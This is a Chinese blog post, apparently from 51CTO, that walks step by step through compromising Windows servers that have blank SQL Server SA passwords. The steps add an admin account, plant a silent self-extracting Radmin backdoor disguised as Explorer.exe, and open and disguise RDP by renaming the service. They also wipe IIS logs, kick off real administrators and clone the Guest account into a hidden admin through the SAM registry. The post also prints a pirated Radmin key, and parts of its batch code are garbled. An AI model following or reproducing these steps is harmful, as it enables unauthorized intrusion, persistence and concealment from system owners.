工具:WINNTAutoAttack(掃漏洞);SQLTOOLS(SA空口令連接器);RAMDIN影子3.0中文版(遠程控制)(RADMIN註冊碼:
08US9A95I+lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA
6A5KKZRHc5GVMIybWomK6rNwoj8mYy8LXRFi23);SC.exe port.bat query.exe quser.exe(隱藏3389服務及不讓管理髮現自己程序);CleanIISLog.exe(小榕的擦PP程序);3389.exe(開3389端口服務的);psu.exe(使用被禁止的Guest帳戶要用到的);mstsc.exe(遠程桌面連接程序)。
6A5KKZRHc5GVMIybWomK6rNwoj8mYy8LXRFi23);SC.exe port.bat query.exe quser.exe(隱藏3389服務及不讓管理髮現自己程序);CleanIISLog.exe(小榕的擦PP程序);3389.exe(開3389端口服務的);psu.exe(使用被禁止的Guest帳戶要用到的);mstsc.exe(遠程桌面連接程序)。
一.掃SA弱口令(自動***器)
二.用SQLTOOLS連上去建一個用戶
開telnet服務
net user mint mint /add
添加用戶mint密碼爲
mint net localgroup administrators mint /add
將帳號mint升級爲管理員 |
三.上傳後門程序RAD.EXE(RADMIN服務端自解壓程序)
製作RAD.EXE過程:
1、到Radmin安裝目錄下找到AdmDll.dll、 raddrv.dll和r_sever.exe;
2、在本地設置服務端(一定要生成);
設置密碼-->>設置連接端口(默認4489)-->>生成
3、導出註冊表HKEY_LOCAL_MACHINE\\SYSTEM\\Radmin的鍵值爲1.reg;
4、編寫一個批處理,並命名爲u.bat;
|
5、寫第二個批處理,r.bat,內容爲:
uninstall /[email protected] /install /
silence@regedit /s 1.reg@echo [email][email protected][/email] /uninstall /
[email][email protected][/email] /install /silence@regedit /
s 1.reg@net start r_server@del
rad.exe@del 1.reg@del r.bat@del u.bat |
6、將AdmDLL.dll raddrv.dll Explorer.exe(r_sever.exe改名) u.bat r.bat壓縮成Rad.RAR壓縮包;
7、將Rad.rar製作成自解壓文件;
選擇Default.sfx的自釋放模塊-->>高級自釋放選項
-->>常規
釋放路徑:%systemroot%\\system32
安裝程序:釋放後運行:r.bat 釋放前運行u.bat
-->>摸式
緘默模式:全部隱藏 覆蓋方式:覆蓋所有文件
-->>確定-->>確定
生成完成。
四.用RADMIN客服端連接
上傳文件到c:\\WINNT(XP是windows):
port.bat(如果是在XP下,這個要把裏面的WINNT改爲Windows)
query.exe quser.exe
SC.exe
CleanIISLog.exe.exe
3389.exe
psu.exe
最好再上傳一個反彈後門RADMIN進入TELNET。
運行c:\\winnt\\3389.exe,重啓肉雞。
五.重啓後用遠程桌面遠程器連上去
這裏就有時會出現個問題。
使用3389登陸,發現登陸用戶已滿,不用怕,我們把他踢出去。
telnet對方ip,發現需要 NTLM 身份驗證。我們在自己的電腦裏建立一個帳號mint密碼爲mint身份爲管理員。
找到c:\\winnt\\system32\\cmd.exe 建立一個快捷方式到桌面。修改cmd的快捷方式屬性爲允許其他身份登陸。然後運行桌面上的cmd.exe的快捷方式。輸入帳號mint密碼mint,telnet對方ip,直接可以登陸對方電腦了。
使用命令:
c:\\query user (查看對方目前終端登陸狀況。)
運行命令:
c:\\logoff 1(踢出去一個管理者)
再用c:\\query user檢查一便~~(這就是爲什麼不馬上用1.bat了)
六.連上後..在cmd下運行
c:\\winnt\\log . 自己的IP .(擦PP)
c:\\winnet\\1.bat (刪除覆蓋查看當前在線用戶文件)
七.打SA空口令補丁
程序-->>Microsoft SQL Server-->>查詢分析器(有放大鏡的)
-->>Windowst身位驗證登陸
複製一下代碼:SELMIS
if exists (select * from dbo.sysobjects where id
= object_id(N\’[dbo].[xp_cmdshell]\’)
and OBJECTPROPERTY(id, N\’IsExtendedProc\’)
= 1) exec sp_dropextendedproc N\’[dbo].[xp_cmdshell]\’GO |
按F5(運行),關了退出SQL Server再用SQL Server身位驗證進一次,退出(這是爲了不留下記錄)。
八.改3389端口和服務名稱
修改服務器端的端口設置,註冊表有2個地方需要修改。
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp],PortNumber值,默認是3389,選擇10進制,修改成所希望的端口,比如1314。
第二個地方:
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] PortNumber值,默認是3389,選擇10進制,修改成所希望的端口,比如1314。
要重啓系統才能用新端口連。(不急..改了他的服務名再重啓系統吧)
導出3389服務的
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\TermService]
的鍵值爲mm.reg文件。編輯mm.reg文件,替換TermService爲Alerter(錯誤警告服務..別的服務也行) 。再把第十行的"Description"="(這裏是服務說明,改爲你所換的服務說明,這裏改爲通知所選用戶和計算機有關係統管理級警報。)"第十一行的"DisplayName"="(這裏是服務名稱,改爲你所換的服務名稱,這裏改爲Alerter)。保存,再導入註冊表(這裏要先運行Services.msc(可在CMD下打這命令)服務管理器..把Alerter的服務先停止)。
再在CMD下
CD c:\\winnt\\
system32 copy termsrv.exe service.exe
(這裏是複製termsrv.exe爲Alerter服務文件名差不多的文件)
CD C:\\winnt sc \\\\127.0.0.1 config Alerter binpath=
c:\\winnt\\system32\\service.exe
(這裏是從新定向Alerter服務文件.服務名一定要區分大小寫A要大寫)
|
九.注消後(注消比直接關要好些)用Radmin重啓肉雞
十.使用被禁用的帳戶[Guest]登陸,刪除自己開始建的帳號
1.使用psu.exe展開註冊表到
HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users
用法:[psu -p regedit -i pid]
Pid 的值爲在任務欄空白處點右鍵-->>任務管理器--->>進程中的winlogon.exe後面的數值就是PID數值。
如:psu –p regedit –i 157
將Guest克成管理員權限,克成管理員權限的方法:
找到HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\Names\\Administrator的類型值。
在HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\下找到這個類型值在複製數值名爲F的數值數劇覆蓋相應的Guest的類型值(找的方法一樣)。
導出Guest的配置(也就是導出HKEY_LOCAL_MACHINE\\SAM\\SAM\\Domains\\Account\\Users\\Guest和他相應的類型值的數據),然後刪除Guest的配置。
2.查看計算機管理中帳戶列表,刷新這時候會出現錯誤[找不到帳戶](跳過這步也行)。
3.將Guest的配置(二個REG文件導進註冊表)。
4.修改Guest帳戶密碼,命令行下禁用Guest帳戶[一定是命令行下]。
[修改密碼]net user Guest /
active:yesnet user Guest /active:no[命令行下禁用Guest] |
5.實驗被禁止的帳戶Guest是否可用。
6.用Guest登陸後刪除自己建的帳號。
![]()
|
整個過程結束。
©著作權歸作者所有:來自51CTO博客作者suifeng1984的原創作品,如需轉載,請註明出處,否則將追究法律責任
Ctrl+Enter 發佈
發佈
取消